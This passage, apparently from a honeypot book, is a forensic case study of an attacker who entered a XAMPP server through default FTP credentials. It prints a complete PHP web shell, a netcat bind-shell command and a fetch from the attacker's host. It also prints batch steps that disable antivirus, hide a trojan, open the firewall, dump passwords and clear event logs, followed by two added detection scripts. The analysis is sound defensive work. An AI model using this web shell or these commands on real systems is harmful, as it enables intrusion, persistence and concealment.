As a second example of an attack against a high-interaction honeypot, we take a closer look at a compromise of a honeypot running Windows 2000 Service Pack 2. This honeypot was on the latest patch level for the operating system, and all patches issued by Microsoft were installed. Thus, it could not easily be compromised by automated attacks from worms or autonomously spreading malware. To offer some bait for an attacker, we again installed some web applications on the honeypot. This time we chose XAMPP version 1.5.5, an easy-to-install Apache distribution containing the tools Apache 2.2.3, MySQL 5.0.27, PHP 5.2.0 and PHP 4.4.4, phpMyAdmin 2.9.1.1, FileZilla FTP Server 0.9.20, and OpenSSL 0.9.8d.
As you can see, all applications are on a fairly recent version and thus should be rather secure. XAMPP itself is designed for a development environment, and the installation notes clearly mention that XAMPP should not be used in a production environment [109]:
XAMPP is configured to be as open as possible and to allow the web developer anything he/she wants. For development environments this is great but in a production environment it could be fatal.
Here is a list of missing security in XAMPP:
The MySQL administrator (root) has no password.
The MySQL daemon is accessible via network.
PhpMyAdmin is accessible via network.
Examples are accessible via network.
The users of Mercury and FileZilla are known.
Please secure XAMPP before publishing anything online.
Thus, the individual software tools are secure, but due to the insecure default configuration, the system as a whole is vulnerable to attacks. This is a common phenomenon in IT security, and we wanted to see whether it could also lead to interesting observations.
You could use a similar honeypot setup to protect your server: deploy a fairly secure honeypot near your valuable boxes (preferably in a separate VLAN) and closely monitor what happens. Again, this can be some kind of burglar alarm and help you to identify the reconnaissance phase of an attack against you.
The attacker managed to access the FTP server provided by XAMPP using a default login and password. Via several steps, he gained access to the Windows command shell and then uploaded his own toolkit. It contained several common attack tools, such as a Trojan Horse with the capability to hide certain files, a keylogger, and a vulnerability scanner. With the help of an automated setup procedure, he installed all tools on the honeypot and then tried to attack other systems. This was, however, successfully blocked by the Honeywall.
11:18:26 PM: The host with IP address 66.70.XXX.XXX connects to the honeypot on TCP port 21. It tries to log in to the FTP server with username ftp and password ftp@ftp.net. This login fails, since no such user exists on the system, and anonymous login is not allowed.
11:18:37 PM: A second login attempt from the same IP address. This time the credentials anyone and anyone@any.net are used. However, this attempt also fails.
11:18:45 PM: A third attempt to log in to the FTP server occurs. This time the attacker uses the username newuser and password wampp. This login is successful! This is an example of an insecure default configuration.
11:30:17 PM: The host with IP address 67.122.XXX.XXX (please note the different IP address compared to the first login) first connects to TCP port 80 and retrieves the website. It then logs in to the FTP server with the credentials newuser and wampp. The attacker searches for the file shell.php, but this file is not available on the machine. He then uploads this file via the command STOR shell.php. This is again an example of an insecure default configuration: the default user can upload arbitrary content to the server.
11:30:43 PM: The attacker accesses the uploaded file shell.php and uses an HTTP POST request to send the string -cmd=dir to the PHP script. As a return value, the script sends back a directory listing to the attacker. As you can see, the attacker can now execute arbitrary commands on the compromised machine by passing them to shell.php via -cmd=<COMMAND>.
11:30:56 PM: The backdoor via shell.php is used to execute the command -cmd=net+start. It returns a listing of all services started by Windows.
11:31:05 PM: Again, the attacker connects to the FTP server and logs in with the default username and password. Similar to before, he first checks whether the file nc.exe exists, and since it is not there, he uploads it via the STOR command. nc.exe is a Windows version of netcat, a tool for arbitrary network connections.
11:31:12 PM: Via the PHP shell backdoor, the uploaded file nc.exe is started. The attacker uses an HTTP POST request with the following parameters to issue a command: -cmd=nc.exe+-L+-p+7988+-e+cmd.exe. These instructions execute the program netcat. The tool listens (parameter -L) on TCP port 7988 (-p 7988) and executes the command cmd.exe (-e cmd.exe) once a TCP connection is established on this network port.
11:31:14 PM: The attacker connects to the honeypot on TCP port 7988. Due to the previous command, he now interacts with cmd.exe, the Windows command shell. The attacker quickly examines the system and lists various directories. Finally, he changes to the directory C:\Programme\xampp\htdocs.
11:31:45 PM: Via the command rcp -b 67.172.XXX.XXX.droppunx:drop.exe drop.exe the attacker tries to copy the file drop.exe from the remote host. rcp is the remote copy program that comes with Windows, similar to the older rcp on Unix-based systems. However, this transfer fails. He then uploads the tool via FTP STOR. With the help of the remote command shell, he navigates to the directory C:\WinNT\system32\wins and moves the file drop.exe there.
11:32:58 PM: The attacker executes the file drop.exe. This file is a self-extracting archive, and it unpacks itself to C:\WinNT\system32\wins. Afterward, he retrieves a listing of the directory content:
02.10.2006 21:50 1.102 bye.txt
05.06.2005 14:56 3.584 CL.exe
09.07.2005 02:02 1.124 clearlogs.bat
01.10.2001 18:30 1.125.392 csrsrv.exe
23.08.2001 05:00 31.232 csx.exe
01.10.2001 18:30 928 d3dix8_23.dll
27.09.2005 15:05 10.835 DFind.exe
02.10.2006 21:49 437 dir.txt
13.08.2004 00:14 2.761 dllhost.exe
12.12.2006 02:12 1.519.855 drop.exe
19.09.2006 19:46 3.723 install.bat
01.10.2001 18:30 843.776 libeay32.dll
02.10.2006 21:48 2.219 log.txt
01.10.2001 18:30 963 mouseserv.drv
27.02.2006 17:24 65.536 pwdump2.exe
05.06.2005 14:56 36.864 samdump.dll
05.12.2005 09:29 38.912 srv.exe
01.10.2001 18:30 159.744 ssleay32.dll
02.10.2006 21:05 1.840 usb.vxd
21.10.2004 15:06 77.824 winfw.exe
20 File(s) 3.928.651 Bytes
2 Directories, 1.990.025.216 Bytes Free
As you can see, drop.exe extracted 19 files into the directory. We will take a closer look at some of these files in the following paragraphs.
Afterward, the compromised host tries to attack other computers in the local network. This is blocked by the Honeywall, and eventually the network access of the honeypot is cut off due to excessive traffic via the Data Control mechanism. The next morning, the honeypot was shut down and analyzed offline.
shell.php: This was the first file uploaded by the attacker. It provides him with a backdoor that he can access via the web. This is a clever way to get remote control of the honeypot: at the beginning, the attacker can only upload arbitrary files, but he cannot execute any commands. He uploads the file shell.php with the following content:
<? $cmd = $_REQUEST["-cmd"]; ?>
<html>
<head><title>help.php</title></head>
<body onLoad="document.forms[0].elements[-cmd].focus()">
<form method=POST><br>
<input type=TEXT name="-cmd" size=64 value="<?=$cmd?>">
<hr><pre>
<? if($cmd != "") print Shell_Exec($cmd); ?>
</pre>
</form></body>
</html>
The request parameter -cmd is assigned to the variable cmd. If cmd is not empty, it is passed to the function Shell_Exec, a PHP function that executes commands via a shell and returns the complete output as a string. The return value is then printed, allowing the attacker to read it via the website. Thus, the attacker can now execute commands of his choice.
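The timeline above is a recognizable chain: failed FTP logins, a successful login as XAMPP's default FTP account, a STOR of an executable file into the web root, and then HTTP POST requests to that same file. The following script is an added example (not from the book or from XAMPP) that correlates these three stages over a simplified event log. The log format, the IP addresses (192.0.2.x documentation addresses) and the timestamps are constructed for the demo; real FileZilla and Apache logs would need their own parsers, but the correlation logic is the same. Only the user name newuser is taken from the case study; FTP servers do not log passwords, so the check keys on the account name.

```python
"""Correlate FTP and HTTP events to flag the XAMPP default-account -> upload -> web-shell chain.

Added example with a constructed log format; not FileZilla's or Apache's native output.
"""
import re
from collections import Counter

# Account XAMPP's bundled FileZilla ships with (case study: newuser / wampp).
DEFAULT_FTP_ACCOUNTS = {"newuser"}
# Uploads the web server or the OS would execute if placed under htdocs.
EXECUTABLE_EXTENSIONS = (".php", ".exe", ".bat")

FTP_LOGIN_RE = re.compile(
    r"^(?P<ts>\S+) FTP (?P<ip>\S+) LOGIN user=(?P<user>\S+) result=(?P<res>OK|FAIL)$")
FTP_STOR_RE = re.compile(r"^(?P<ts>\S+) FTP (?P<ip>\S+) STOR (?P<file>\S+)$")
HTTP_RE = re.compile(
    r'^(?P<ts>\S+) HTTP (?P<ip>\S+) "(?P<method>GET|POST) (?P<path>\S+)" (?P<status>\d{3})$')

# Constructed sample events mirroring the case study timeline (hypothetical addresses).
SAMPLE_LOG = """\
23:18:26 FTP 192.0.2.10 LOGIN user=ftp result=FAIL
23:18:37 FTP 192.0.2.10 LOGIN user=anyone result=FAIL
23:18:45 FTP 192.0.2.10 LOGIN user=newuser result=OK
23:30:17 HTTP 192.0.2.20 "GET /" 200
23:30:18 FTP 192.0.2.20 LOGIN user=newuser result=OK
23:30:20 FTP 192.0.2.20 STOR shell.php
23:30:43 HTTP 192.0.2.20 "POST /shell.php" 200
23:31:05 FTP 192.0.2.20 STOR nc.exe
23:31:12 HTTP 192.0.2.20 "POST /shell.php" 200
""".splitlines()


def analyze(lines):
    """Return a list of (timestamp, finding, source_ip, detail) tuples."""
    findings = []
    failures = Counter()   # failed FTP logins per source IP (guessing indicator)
    uploaded = set()       # executable file names stored via FTP so far
    for line in lines:
        m = FTP_LOGIN_RE.match(line)
        if m:
            if m["res"] == "FAIL":
                failures[m["ip"]] += 1
            elif m["user"] in DEFAULT_FTP_ACCOUNTS:
                findings.append((m["ts"], "default-account-login", m["ip"],
                                 f"user={m['user']} prior_failures={failures[m['ip']]}"))
            continue
        m = FTP_STOR_RE.match(line)
        if m:
            name = m["file"].lower()
            if name.endswith(EXECUTABLE_EXTENSIONS):
                uploaded.add(name)
                findings.append((m["ts"], "executable-upload", m["ip"], m["file"]))
            continue
        m = HTTP_RE.match(line)
        if m and m["method"] == "POST":
            # Compare the requested file name with names seen in STOR commands.
            name = m["path"].split("?", 1)[0].rsplit("/", 1)[-1].lower()
            if name in uploaded:
                findings.append((m["ts"], "webshell-post", m["ip"], m["path"]))
    return findings


if __name__ == "__main__":
    for finding in analyze(SAMPLE_LOG):
        print(*finding)
```

Run stand-alone, the script reports the default-account login (with the two preceding failures), both executable uploads, and the two POST requests to shell.php. In practice the same correlation would be fed from the FTP server log, the web server access log and, for the netcat listener on port 7988, the Honeywall's connection records.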
nc.exe: Netcat, commonly abbreviated as nc, is the "TCP/IP Swiss army knife" according to its man page. It is a simple yet powerful tool to read and write data across network connections. It can be used to transfer data from one host to another, to bind executables to a port, and for many other purposes. Netcat was originally developed for Unix-based systems, but it is also available for Windows, and the attacker used that version.
drop.exe: This self-extracting archive contains a complete tool suite for the attacker. Upon execution, the file extracts 19 other files, among them Trojan Horses, rootkits, a password dumper, and many others. The important part of this archive is the included batch file, install.bat. It is executed after the extraction has finished and controls the installation process.
install.bat: This batch file installs all tools used by the attacker and is the most important file in the archive, since it sets up everything. We briefly describe the main steps. At first, it stops several antivirus engines on the system via srv stop:
srv stop "sophos anti-virus network"
srv stop "Microsoft NetWork FireWall Services"
srv stop "Norton AntiVirus Server"
[...]
This way, common antivirus engines are disabled, and the installation routine can continue. The script then moves several files into the Windows system folder and changes the attributes of some of them.
[...]
move dir.txt %windir%\system32\dhcp
move usb.vxd %windir%\system32\drivers
move csrsrv.exe %windir%\system32
move mouseserv.drv %windir%\system32
move d3dix8_23.dll %windir%\system32
attrib +h +s -r %windir%\system32\csrsrv.exe
attrib +h +s -r %windir%\system32\drivers\usb.vxd
[...]
This is the actual installation procedure. The important files from the attacker are moved to the system32 folder and marked hidden (+h) and system (+s). The attacker then uses a Trojan Horse with rootkit capabilities to hide the presence of some files. The Trojan with the file name csrsrv.exe is installed by the batch file, and then the corresponding Windows service is started:
%windir%\system32\csrsrv.exe -install
%windir%\system32\csrsrv.exe /h /i
srv start COMSrv
net1 start COMSrv
To allow remote access to the infected machine, the Trojan Horse also needs to send and receive network packets. Thus, the attacker uses winfw to add an exception for it to the Windows firewall:
winfw app add c:\windows\system32\csrsrv.exe /name:"COM+ Base Service"
winfw app add c:\winnt\system32\csrsrv.exe /name:"COM+ Base Service"
winfw app set /name:"COM+ Base Service" /enable
The batch file then executes the binary pwdump2, a password dumper. This executable should dump the password hashes, but this fails in the current situation, since the attacker does not have sufficient privileges to execute it:
pwdump2.exe >> pass.txt
install.bat then renames some Windows binaries and overwrites the originals with copies of cmd.exe, the Windows command shell:
rename %windir%\system32\ftp.exe shellsc.exe
rename %windir%\system32\rcp.exe shellsd.exe
rename %windir%\system32\net.exe win32sl.exe
rename %windir%\system32\net1.exe win32slc.exe
copy %windir%\system32\cmd.exe %windir%\system32\ftp.exe /y
copy %windir%\system32\cmd.exe %windir%\system32\tftp.exe /y
copy %windir%\system32\cmd.exe %windir%\system32\rcp.exe /y
copy %windir%\system32\cmd.exe %windir%\system32\net1.exe /y
copy %windir%\system32\cmd.exe %windir%\system32\net.exe /y
The attacker presumably wants to be sure that he has access to the Windows command shell in several different ways. Next, he uses the tool cacls.exe to modify the file access control lists (ACLs):
%windir%\system32\cacls.exe cacls.exe /E /C /P SYSTEM:N /y
The parameter /E edits the ACL instead of replacing it, /C continues on errors, /P replaces SYSTEM's access permission with NONE, and /y should answer "Yes" to any question (however, this is not supported in this version of cacls.exe). This command thus revokes SYSTEM's permissions on the cacls.exe binary itself.
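The rename/copy step above leaves two artifacts that a defender can find without any knowledge of the toolkit: several system32 binaries (ftp.exe, tftp.exe, rcp.exe, net.exe, net1.exe) become byte-identical to cmd.exe, and the renamed originals appear under names (shellsc.exe, shellsd.exe, win32sl.exe, win32slc.exe) that no baseline of the directory contains. The following is an added example (not the book's code) that performs both checks with hashes and a name allowlist. It builds a throwaway stand-in directory with placeholder bytes so it runs anywhere; on a real system the same functions would be pointed at %windir%\system32 and at a baseline taken from a known-good install.

```python
"""Find cmd.exe clones and unexpected names in a system32-like directory.

Added example; the demo directory and its contents are constructed placeholders.
"""
import hashlib
import os
import tempfile


def sha256_file(path):
    """SHA-256 of a file, read in chunks so large binaries do not need to fit in memory."""
    h = hashlib.sha256()
    with open(path, "rb") as f:
        for chunk in iter(lambda: f.read(1 << 16), b""):
            h.update(chunk)
    return h.hexdigest()


def find_cmd_clones(system32, reference="cmd.exe"):
    """Sorted names of files in `system32` that are byte-identical to `reference`."""
    ref_hash = sha256_file(os.path.join(system32, reference))
    clones = []
    for name in sorted(os.listdir(system32)):
        if name.lower() == reference.lower():
            continue
        path = os.path.join(system32, name)
        if os.path.isfile(path) and sha256_file(path) == ref_hash:
            clones.append(name)
    return clones


def find_unexpected_names(system32, baseline):
    """Sorted file names present in `system32` but absent from the known-good baseline."""
    known = {n.lower() for n in baseline}
    return sorted(n for n in os.listdir(system32) if n.lower() not in known)


# Hypothetical baseline: the names a known-good system32 would contain for this demo.
DEMO_BASELINE = {"cmd.exe", "ftp.exe", "tftp.exe", "rcp.exe", "net.exe", "net1.exe", "calc.exe"}


def build_demo_system32():
    """Constructed stand-in for system32 after install.bat ran (placeholder bytes, not real binaries)."""
    d = tempfile.mkdtemp(prefix="fake_system32_")
    cmd = b"placeholder bytes standing in for cmd.exe"
    files = {
        "cmd.exe": cmd,
        "ftp.exe": cmd,      # overwritten with cmd.exe by install.bat
        "tftp.exe": cmd,
        "rcp.exe": cmd,
        "net.exe": cmd,
        "net1.exe": cmd,
        "shellsc.exe": b"placeholder for the original ftp.exe",   # renamed original
        "win32sl.exe": b"placeholder for the original net.exe",   # renamed original
        "calc.exe": b"placeholder for an untouched binary",
    }
    for name, data in files.items():
        with open(os.path.join(d, name), "wb") as f:
            f.write(data)
    return d


if __name__ == "__main__":
    demo = build_demo_system32()
    print("byte-identical to cmd.exe:", find_cmd_clones(demo))
    print("not in baseline:", find_unexpected_names(demo, DEMO_BASELINE))
```

Hashing against cmd.exe catches this particular trick; comparing every hash against a signed baseline (or a vendor catalog) generalizes it to any overwritten binary. The name check is deliberately simple: it only works when a baseline of the directory exists, which is a good argument for recording one when a host is built.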
Next, the attacker uses a logfile cleaner to hide his traces:
CL.exe 1
CL.exe 2
CL.exe 3
CL.exe first clears the application log (parameter 1), then the security log (parameter 2), and finally the system log (parameter 3). This is not stealthy, but it is an efficient way to remove the traces left by the attack.
Next, the batch file starts all disabled antivirus engines again. All important files from the attacker are now hidden with the help of the Trojan Horse, so he can enable everything again:
[...]
srv start "NAV Auto-Protect"
srv start "NAV Alert"
srv start "eTrust InoculateIT Job Server"
[...]
Then the Windows service started by the Trojan Horse is configured to restart on failure, and several dependencies are introduced to make cleanup harder: the standard lanmanserver and lanmanworkstation services are made dependent on COMSrv (the command syntax of csx.exe is that of the Windows service control tool sc.exe):
c:/winnt/system32/csx.exe failure COMSrv reset=1 actions=restart/10
c:/windows/system32/csx.exe failure COMSrv reset=1 actions=restart/10
csx.exe config COMSrv error=ignore
csx.exe failure COMSrv actions=restart/500 reset=10
csx.exe config lanmanserver depend=COMSrv
csx.exe config lanmanworkstation depend=COMSrv
The vulnerability scanner Dfind.exe is then used to scan the local system with a banner scan — that is, just grabbing all banners displayed by network services. This is the final check to see whether everything is working as expected:
start Dfind.exe -ban 1 65535 127.0.0.1 2500
Dfind also has the capability to exploit other systems, but this is not used in this case. Finally, the batch file deletes some files that are not useful anymore and then finishes the installation process:
[...]
del pwdump2.exe
del samdump.dll
del dllhost.exe
The other files uploaded by the attacker include another Trojan Horse and a keylogger. We refrain from describing them in more detail, since they are not used by the attacker during this attack.
The attacker seems to be somewhat experienced. He knows what to look for and has his own, well-prepared toolkit to quickly take over the compromised system. He knew the default password of XAMPP and quickly obtained a command shell on the honeypot.
With the tool Dfind, he then scanned the local network for other vulnerable machines. This was picked up and blocked by the Honeywall. Based on this behavior, we can assume that the attacker intended to use the compromised system as a stepping stone to attack other machines.